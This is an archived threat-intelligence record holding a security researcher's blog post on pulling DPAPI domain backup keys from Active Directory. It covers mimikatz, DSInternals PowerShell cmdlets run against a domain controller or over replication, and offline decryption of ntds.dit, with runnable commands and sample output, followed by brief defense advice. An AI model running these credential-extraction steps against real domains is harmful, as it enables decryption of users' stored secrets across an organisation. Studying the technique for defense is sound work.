{
	"id": "5759ab8b-e480-4c23-871c-09852bd7a935",
	"created_at": "2026-04-06T00:13:25.443328Z",
	"updated_at": "2026-04-10T13:11:52.910886Z",
	"deleted_at": null,
	"sha1_hash": "de0003bf0429e33ac1797a8031fcf6c357d4477e",
	"title": "Retrieving DPAPI Backup Keys from Active Directory",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 126857,
	"plain_text": "Retrieving DPAPI Backup Keys from Active Directory\r\nBy Michael Grafnetter\r\nPublished: 2015-10-26 · Archived: 2026-04-02 12:24:54 UTC\r\nThe Data Protection API (DPAPI) is used by several components of Windows to securely store passwords, encryption keys and other sensitive data. When DPAPI is used in an Active Directory domain environment, a copy of the user’s master key is encrypted with a so-called DPAPI Domain Backup Key that is known to all domain controllers. Windows Server 2000 DCs use a symmetric key and newer systems use a public/private key pair. If the user password is reset and the original master key is rendered inaccessible to the user, the user’s access to the master key is automatically restored using the backup key.\r\nThe Mimikatz Method\r\nBenjamin Delpy has already found a way to extract these backup keys from the LSASS of domain controllers. It is implemented in the lsadump::backupkeys mimikatz command and it even works remotely:\r\nDSInternals Implementation\r\nThis attack is also implemented in my DSInternals PowerShell module:\r\nGet-LsaBackupKey -ComputerName dc01.contoso.com |\r\n Save-DPAPIBlob -DirectoryPath '.\\Output'\r\nSharpDPAPI Implementation\r\nThe same attack technique has also been implemented in GhostPack:\r\nhttps://www.dsinternals.com/en/retrieving-dpapi-backup-keys-from-active-directory/\r\nPage 1 of 5\n\nKey Storage\r\nI have taken Benjamin’s research one step further and I can now extract these keys directly from the Active Directory database, where they are physically stored:\r\nThe keys are stored in the currentValue attribute of objects whose names begin with BCKUPKEY and are of class secret. The BCKUPKEY_PREFERRED Secret and BCKUPKEY_P Secret objects actually only contain GUIDs of objects that hold the current modern and legacy keys, respectively. Furthermore, the currentValue attribute is encrypted using BootKey (aka SysKey) and is never sent through LDAP. After decrypting it, we will get a self-signed certificate with no subject:\r\nThe Database Dump Method\r\nThe Get-BootKey, Get-ADDBBackupKey and Save-DPAPIBlob cmdlets from my DSInternals PowerShell Module can be used to retrieve the DPAPI Domain Backup Keys from ntds.dit files:\r\n# We need to get the BootKey from the SYSTEM registry hive first:\r\nGet-BootKey -SystemHiveFilePath 'C:\\IFM\\registry\\SYSTEM'\r\n\u003c#\r\nOutput:\r\n41e34661faa0d182182f6ddf0f0ca0d1\r\n#\u003e\r\n# Now we can decrypt the DPAPI backup keys from the database:\r\nGet-ADDBBackupKey -DBPath 'C:\\IFM\\Active Directory\\ntds.dit' `\r\n -BootKey 41e34661faa0d182182f6ddf0f0ca0d1 |\r\n Format-List\r\n\u003c#\r\nOutput:\r\nType: LegacyKey\r\nDistinguishedName: CN=BCKUPKEY_7882b20e-96ef-4ce5-a2b9-3efdccbbce28 Secret,CN=System,DC=Adatum,DC=com\r\nRawKeyData: {77, 138, 250, 6...}\r\nKeyId: 7882b20e-96ef-4ce5-a2b9-3efdccbbce28\r\nType: PreferredLegacyKeyPointer\r\nDistinguishedName: CN=BCKUPKEY_P Secret,CN=System,DC=Adatum,DC=com\r\nRawKeyData: {14, 178, 130, 120...}\r\nKeyId: 7882b20e-96ef-4ce5-a2b9-3efdccbbce28\r\nType: RSAKey\r\nDistinguishedName: CN=BCKUPKEY_b1c56a3e-ddf7-41dd-a5f3-44a2ed27a96d Secret,CN=System,DC=Adatum,DC=com\r\nRawKeyData: {48, 130, 9, 186...}\r\nKeyId: b1c56a3e-ddf7-41dd-a5f3-44a2ed27a96d\r\nType: PreferredRSAKeyPointer\r\nDistinguishedName: CN=BCKUPKEY_PREFERRED Secret,CN=System,DC=Adatum,DC=com\r\nRawKeyData: {62, 106, 197, 177...}\r\nKeyId: b1c56a3e-ddf7-41dd-a5f3-44a2ed27a96d\r\n#\u003e\r\n# In most cases, we just want to export these keys to the file system:\r\nGet-ADDBBackupKey -DBPath 'C:\\IFM\\Active Directory\\ntds.dit' `\r\n -BootKey 41e34661faa0d182182f6ddf0f0ca0d1 |\r\n Save-DPAPIBlob -DirectoryPath .\\Keys\r\n# New files should have been created in the Keys directory:\r\n(dir .\\Keys).Name\r\n\u003c#\r\nOutput:\r\nntds_capi_b1c56a3e-ddf7-41dd-a5f3-44a2ed27a96d.pfx\r\nntds_legacy_7882b20e-96ef-4ce5-a2b9-3efdccbbce28.key\r\n#\u003e\r\nNote that mimikatz would name these files similarly.\r\nThe DRSR Method\r\nThe same result can be achieved by communicating with the Directory Replication Service using the Get-ADReplBackupKey cmdlet:\r\nGet-ADReplBackupKey -Domain 'Adatum.com' -Server LON-DC1 |\r\n Save-DPAPIBlob -DirectoryPath .\\Keys\r\nDefense\r\nI am already starting to repeat myself:\r\nRestrict access to domain controller backups.\r\nBe cautious when delegating the Replicating Directory Changes All right.\r\nSource: https://www.dsinternals.com/en/retrieving-dpapi-backup-keys-from-active-directory/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.dsinternals.com/en/retrieving-dpapi-backup-keys-from-active-directory/"
	],
	"report_names": [
		"retrieving-dpapi-backup-keys-from-active-directory"
	],
	"threat_actors": [],
	"ts_created_at": 1775434405,
	"ts_updated_at": 1775826712,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/de0003bf0429e33ac1797a8031fcf6c357d4477e.pdf",
		"text": "https://archive.orkl.eu/de0003bf0429e33ac1797a8031fcf6c357d4477e.txt",
		"img": "https://archive.orkl.eu/de0003bf0429e33ac1797a8031fcf6c357d4477e.jpg"
	}
}